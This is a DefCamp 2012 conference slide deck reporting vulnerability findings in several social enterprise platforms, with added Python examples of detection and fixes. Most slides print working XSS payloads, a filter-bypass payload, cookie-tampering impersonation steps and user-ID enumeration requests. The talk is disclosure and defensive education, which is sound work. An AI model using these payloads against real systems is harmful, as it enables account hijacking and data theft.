Social Enterprise Rises! …and so are the Risks - DefCamp 2012

  1. Social Enterprise Software Rises! …and so are the Risks
     Marian Ventuneac, marian.ventuneac@gmail.com, @mventuneac

  2. About myself
     - Security Architect
     - International presenter
     - Member of OWASP and ISACA global organizations
     - OWASP Ireland Limerick Chapter Leader, https://www.owasp.org/index.php/Ireland-Limerick
     - Security Researcher, PhD, MEng: http://www.ventuneac.net, http://secureappdev.blogspot.com, http://dcsl.ul.ie
     An Introduction to Web Application Security Risks

  3. Agenda
     - Social Enterprise Software: What, Why, and How?
     - Social Enterprise Software & Risks
     - Thoughts on Calculated Risk
     - Social Enterprise Software & Risks (some case studies)
     - Final Thoughts

  4. Social Enterprise Software: What?
     - Social Enterprise / Social Enterprise Networks / Social Enterprise Software
     - Enterprise solutions providing Facebook-like social networking functionality
     - ‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’

  5. Social Enterprise Software: Why?
     - Improve communication and increase work efficiency
       - internal collaboration
         - establish teams, communities or informal groups
         - share knowledge and learn from other people's experiences
         - social networking
       - external collaboration with partners …
     - Used by employees and by external customers, suppliers, partners

  6. Social Enterprise Software: Deployment models
     - On-premise solutions
       - Deployed inside the enterprise network, usually controlled and managed by the client
     - Public Cloud-based solutions
       - Software as a Service (SaaS): hosted and administered by the vendor
     - Hybrid deployments
     - Usually open to allow external collaboration
       - customers, suppliers, third-party contractors, etc.

  7. Social Enterprise Software: Some of the Risks
     - Potential loss of enterprise data
       - Understand what type of data needs to be uploaded there
       - Do you know/control what data is actually being shared?
     - Exploitation of common application vulnerabilities
     - Phishing attacks, social engineering
     - Viruses and malware
     - Cloud-based solutions – various compliance and security concerns
       - Do you know where your data is stored?

  8. Common Strategies for Risk Mitigation
     - Vendor/supplier due diligence
     - Security policies (generic/dedicated)
     - Security processes & procedures
     - Control the data being shared (data classification)
     - Verify the identity of users accessing the data (authentication)
     - Control user access to data
     - Approve/Create/Lock user accounts (account management)
     - Remote wipe (for mobile devices – smartphones, tablets, etc.)
     - …
  9. Calculated Risks

  10. Calculated Risks (cont)
      - Business requirement: WE (the company) need social enterprise software X for Y and Z reasons.
      - IT Security (most likely take on it):
        - Scenario 1: No, there is too much risk to take!
        - Scenario 2: Yes - we trust our partners and their choices.
        - Scenario 3: Yes - IF the Business ASSUMES ALL THE RISKS…
        - Scenario 4: Let’s take a closer look at it…
        - Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)

  11. Let’s Take a Closer Look
      - Software defects leading to exploitation of security vulnerabilities
        - OWASP Top 10 Security Risks
        - CWE/SANS Top 25 Programming Errors
      - Vendor size – a plus, but doesn’t guarantee the chosen solution is vulnerability free
      - It is safe to assume there is no application that is 100% secure
        - If anyone claims such a thing, can they provide reasonable proof?

  12. Let’s Take a Closer Look (cont)
      - Trust but verify
      - Reach an agreement to test the chosen solution in a suitable environment (ideally prior to any contracts being signed)
        - Manual security testing
        - Automated security testing
      - Responsible disclosure
      - Most likely you will not be disappointed

  13. The Closer Look (cont)
      - A practical take on assessing the security of social enterprise software solutions
      - Some of the chosen ones

  14. The Closer Look (cont)
      - Assessment criteria including tests for
        - Cross-Site Scripting (XSS)
        - Insecure Direct Object Reference
        - Security Misconfiguration
        - Failure to Restrict URL Access
        - Unvalidated Redirects and Forwards
        - Logical Flaws
        - …
  15. Blogtronix Enterprise
      - Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
      - CVE-2011-1039 - Multiple XSS Vulnerabilities
      - Persistent (partially) XSS via Search functionality (authenticated user)
        - HTTP request: `http://test_site/Home/pages/search/?search=<script>alert(document.cookie)</script>&sub=1&tab=0`
        - HTTP response: `… <a href="/Home/pages/search/?search=%3cscript%3ealert(document.cookie)%3b&amp;sub=1&amp;tab=0"><script>alert(docume...</a> </span> <span style=" …`

  16. Blogtronix Enterprise (cont)
      - CVE-2011-1039 - Multiple XSS Vulnerabilities
      - Reflected XSS in login page via an arbitrary parameter
        - HTTP request: `https://test_site/pages/login/?a"'><script>alert(document.cookie)</script>`
        - HTTP response: `<form method="post" action="/pages/login/?a"'><script>alert(document.cookie)</script>" id="aspnetForm">`
      - Multiple Reflected XSS via existing and arbitrary parameters of existing resources

  17. Blogtronix Enterprise (cont)
      - Insecure Direct Object Reference (variant)
      - Valid user A can potentially impersonate another user B
      - Tamper with the value of the `userAccountID_http://test_site/` cookie (an ASP.NET GUID)
        1. At login time, replace the value of the `userAccountID_` cookie with the one matching user B
        2. Do something noticeable (post a message in group X) & log out
        3. As authenticated user A, review user B’s recent activity – user B appears as a recent visitor of group X

  18. Blogtronix Enterprise (cont)
      - Security Misconfiguration
      - Enumerate valid user IDs
        - Unauthenticated attacker checks for `https://test_site/users/user_id`
          - if user_id exists, redirected to login
          - if not, a custom error is displayed
      - Enumerate valid groups
        - Unauthenticated attacker checks for `https://test_site/group_id/pages/people/`
          - if group_id exists, redirected to login
          - if not, a custom error is displayed
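The enumeration oracle on slide 18, as an added example that is not from the talk or the vendor: a request handler that resolves existence before checking the session (so anonymous callers get a login redirect for real IDs and an error page for the rest), the reordered handler that checks authentication first, and the differential check an assessor runs against both. The ID tables, paths and handler names are constructed for the example.

```python
# Constructed sample data; the talk's test site and its real IDs are not on the page.
KNOWN_USERS = {"1001", "1002"}
KNOWN_GROUPS = {"engineering", "sales"}

LOGIN_REDIRECT = (302, "/pages/login/")
NOT_FOUND = (404, "custom error page")


def make_handler(known_ids, auth_first):
    """Return a handler for /users/<id> or /<group_id>/pages/people/.

    auth_first=False reproduces the misconfiguration from the slide: existence
    is resolved before the login check, so an anonymous caller learns which IDs
    are real from the response. auth_first=True checks the session first, so
    every anonymous request gets the same redirect and existence stays hidden.
    """
    def handle(resource_id, authenticated):
        if auth_first and not authenticated:
            return LOGIN_REDIRECT
        if resource_id not in known_ids:
            return NOT_FOUND
        if not authenticated:
            return LOGIN_REDIRECT
        return (200, "page for %s" % resource_id)
    return handle


def leaks_existence(handler, known_id, unknown_id):
    """Assessment check: send the two anonymous requests the slide describes
    and report whether the responses differ (status or body); any difference
    is an oracle that lets valid IDs be enumerated."""
    return handler(known_id, False) != handler(unknown_id, False)


# Vulnerable and fixed variants for both resource types on the slide
vulnerable_user_page = make_handler(KNOWN_USERS, auth_first=False)
fixed_user_page = make_handler(KNOWN_USERS, auth_first=True)
vulnerable_group_page = make_handler(KNOWN_GROUPS, auth_first=False)
fixed_group_page = make_handler(KNOWN_GROUPS, auth_first=True)

if __name__ == "__main__":
    for name, h in [("users", vulnerable_user_page), ("users (fixed)", fixed_user_page),
                    ("groups", vulnerable_group_page), ("groups (fixed)", fixed_group_page)]:
        print(name, "leaks existence:", leaks_existence(h, "1001", "9999"))
```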
  19. Blogtronix Enterprise (cont)
      - Improper Error Handling

  20. Blogtronix Enterprise (cont)
      - CVE-2011-1040 Unvalidated Redirects
        - `https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f`
        - Once the user logs in, he/she gets redirected to the resource previously stated via the ReturnUrl parameter
      - CVE-2011-1041 Failure to restrict access to protected resources
        - Attacker knows the hashed user ID and the name of an uploaded file => the file can be accessed without authentication
        - Attacker knows the hashed user ID => the user's profile picture can be accessed without authentication
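A validator for the ReturnUrl pattern from slide 20, added here as an example and not the vendor's code: only a site-relative path is accepted as the post-login destination, so the absolute URL in the slide's request falls back to a default landing page. The default page path, the function names and the decode-once step (mirroring what a web framework does with a query-string value) are assumptions.

```python
from urllib.parse import unquote, urlsplit

DEFAULT_LANDING = "/Home/"  # assumed post-login page, not taken from the vendor


def is_safe_return_url(target: str) -> bool:
    """Allow only a site-relative path as a post-login destination.

    Rejects anything carrying a scheme or host (http://..., //host/...), the
    backslash form some browsers normalise to a host (/\\host), and control
    characters, so a ReturnUrl value cannot send the user off-site after login.
    """
    if not target or not target.startswith("/"):
        return False
    if target.startswith("//") or target.startswith("/\\"):
        return False
    if "\\" in target or any(ord(ch) < 0x20 or ch == "\x7f" for ch in target):
        return False
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""


def safe_redirect_from_query(raw_return_url: str, default: str = DEFAULT_LANDING) -> str:
    """Decode the query-string value once (as the framework would), validate it,
    and fall back to the default landing page on anything suspicious."""
    target = unquote(raw_return_url or "")
    return target if is_safe_return_url(target) else default


if __name__ == "__main__":
    # The slide's request: an absolute URL that must not be honoured
    print(safe_redirect_from_query("http%3a%2f%2fwww.google.co.uk%2f"))
    # A legitimate deep link into the application is kept
    print(safe_redirect_from_query("%2fHome%2fpages%2fsearch%2f%3fsearch%3dteam"))
```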
  21. Salesforce Chatter SaaS
      - Multiple persistent XSS vulnerabilities
        - via user profile first & last name: `<a href="/005D00000022Ouw" class="entityLink" title="Adam" onmouseover="alert(1)" Cole">Adam&quot; onmouseover=&quot;alert(1)&quot; Cole</a>`
        - via group name: `<a href="/0F9D0000000PPwz" class="entityLink" title="test_group" onmouseover="alert(3)"">test_group&quot; onmouseover=&quot;alert(3)&quot;</a>`

  22. Salesforce Chatter SaaS (cont)
      - Improper User Input Validation
      - File Sharing - CR LF symbols accepted into the file title (via SaaS solution)
        - `POST /mobile/direct/23.0/005D0000001yD7B/feed_items.json HTTP/1.1`
        - `Host: eu1.salesforce.com`
        - …
        - `Content-Disposition: form-data; name="title"`
        - `arv_test52%0a%0d%0a`

  23. Salesforce Chatter Desktop
      - Improper Error Handling leading to Information Disclosure
      - submitting comments for a non-existent post
        - HTTP POST request: `/mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1`
        - Error: `{"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149\nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}`
      - attempting to ‘like’ a non-existent post
        - HTTP POST request: `/mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1`
        - Error: `{"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDLIKE", line 156\nORA-06512: at "DOPEY.CFEEDLIKE", line 217\nORA-06512: at "DOPEY.CFEEDLIKE", line 118\nORA-06512: at line 1\n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}`

  24. Yammer
      - Persistent XSS via group name
      - HTTP POST request:
        - `POST /ventuneac.net/groups HTTP/1.1`
        - `Host: www.yammer.com`
        - …
        - `-----------------------------295562556131627`
        - `Content-Disposition: form-data; name="group[name]"`
        - `a4" onmouseover="alert(4)"`
        - `-----------------------------295562556131627`
      - HTTP response (home page):
        - `GET /ventuneac.net/ HTTP/1.1`
        - `Host: www.yammer.com`
        - …
        - `<a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group">`

  25. Jive
      - Persistent XSS via group name (create/edit)
      - HTTP POST request:
        - `POST /create-group.jspa HTTP/1.1`
        - `Host: ventuneac.jiveon.com`
        - …
        - `-----------------------------215202979014924`
        - `Content-Disposition: form-data; name="description"`
        - `group2"><script>alert(1)</script>`
        - `-----------------------------215202979014924`
      - HTTP response (load group from Places):
        - `GET /groups/group2 HTTP/1.1`
        - `Host: ventuneac.jiveon.com`
        - …
        - `<meta name="description" content="group2"> <script>alert(1)</script>" />`
  26. BroadVision Clearvale SaaS
      - Multiple persistent XSS vulnerabilities
        - via user profile first & last name & search page: `<a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))">m&quot; style=&quot;xss:expr/*XS...</a>`
        - via group name & search page: `<a href="http://vmarian.clearvale.com/pg/groups/23/aaaa-stylexssexprxssessiondocumentlocationhttpwwwgooglecouk/" title="aaa"> <a style="xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))"> aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a>`

  27. BroadVision Clearvale SaaS (cont)
      - The broken fix for the user profile name XSS issue
      - Black-list style user input validation
        - `style` followed by `=` becomes `style00` (`style=`, `style =`, etc.)
        - `document.location` followed by `(` becomes `document.location00`
        - `alert` followed by `(` becomes `00`
        - `/*` becomes `/0*` for the first instance only
        - `*/` becomes `*0/`
        - …
      - Improper output escaping

  28. BroadVision Clearvale SaaS (cont)
      - The broken fix for the user profile name XSS issue
      - Bypassing the Clearvale XSS filter
        - XSS payload:
          - firstname: `m" style`
          - lastname: `="/**/;xss:expr/**/ession(alert/**/('aaa'))`
        - HTTP response: `… <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa'))">m&quot; style =&quot;/0**0/;xss:...</a>`
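Why the black-list fix on slide 27 fails and what slide 27's "improper output escaping" point asks for, as an added example (a reconstruction of the filter from the slide's description, not the vendor's code): each name field is filtered on its own and then both are joined into one title attribute, so the bypass payload from slide 28 never contains the `style=` token the filter rewrites, while attribute-context output encoding neutralises it regardless of what the fields contain. The profile path, the rendering helper and the detection regex are assumptions.

```python
import html
import re

# Constructed from the bypass on slide 28: filtered separately, the two fields
# are harmless; concatenated into one attribute they form style ="...".
FIRST_NAME = 'm" style'
LAST_NAME = "=\"/**/;xss:expr/**/ession(alert/**/('aaa'))"


def clearvale_style_blacklist(value: str) -> str:
    """Reconstruction (an assumption, not vendor code) of the black-list filter
    described on slide 27: a few dangerous tokens are rewritten, the rest passes."""
    value = re.sub(r"style\s*=", "style00", value)          # style=, style =, ...
    value = value.replace("document.location(", "document.location00")
    value = value.replace("alert(", "00")
    value = value.replace("/*", "/0*", 1)                   # first instance only
    value = value.replace("*/", "*0/", 1)
    return value


def escape_attr(value: str) -> str:
    """The alternative the slide calls for: encode for the HTML attribute
    context at output time, whatever the input looked like."""
    return html.escape(value, quote=True)


def render_profile_link(first: str, last: str, sanitize) -> str:
    """Build the link the way the page shows it: each field sanitised on its own,
    then concatenated inside the title attribute (profile path is a placeholder)."""
    return '<a href="/pg/profile/3" rel="me" title="%s %s">%s</a>' % (
        sanitize(first), sanitize(last), sanitize(first))


def attribute_injected(fragment: str) -> bool:
    """Detection check: a closing quote followed by a style attribute inside the
    tag means the name broke out of title="..." and added its own attribute."""
    return re.search(r'title="[^"]*"\s*style\s*=', fragment) is not None


if __name__ == "__main__":
    for label, sanitize in (("black-list", clearvale_style_blacklist), ("escape", escape_attr)):
        out = render_profile_link(FIRST_NAME, LAST_NAME, sanitize)
        print(label, "injected:", attribute_injected(out), out)
```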
  29. Knowing What ‘private’ Really Means
      - Social Enterprise Software usually provides document sharing/publishing functionality
        - Private (not shared with anyone – default option)
        - Shared with private (locked) groups/members
        - Shared with public groups
        - Shared with everyone (shared via public link)
      - In certain conditions, the private documents can become… less private

  30. AntiVirus & anti-malware file scanning
      - BroadVision Clearvale has a built-in AV scanning engine
      - The rest of the tested solutions currently lack such capabilities
      - Yammer and Salesforce plan to add AV file scanning
      - No malicious files were used for testing AV capabilities

  31. The Closer Look: Summary
      - Common security vulnerabilities - can be easily exploited
      - User-shared information is not properly validated and sanitised
        - A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc.
        - Where such user-controlled data is seen/accessed by other users, their accounts can easily get compromised
      - Exploitation of such vulnerabilities could severely compromise the security of enterprise data

  32. Final Thoughts
      - Even if the vendor is a market leader, it doesn’t necessarily mean they get application security right
      - Dare to ask for proofs of application security
        - Trust but verify
      - Vendor due diligence, social enterprise software related security policies & security procedures, etc.
      - Interested in this kind of benchmark? OWASP Security Baseline Project, https://www.owasp.org/index.php/OWASP_Security_Baseline_Project

  33. Thank You
      marian.ventuneac@gmail.com, @mventuneac
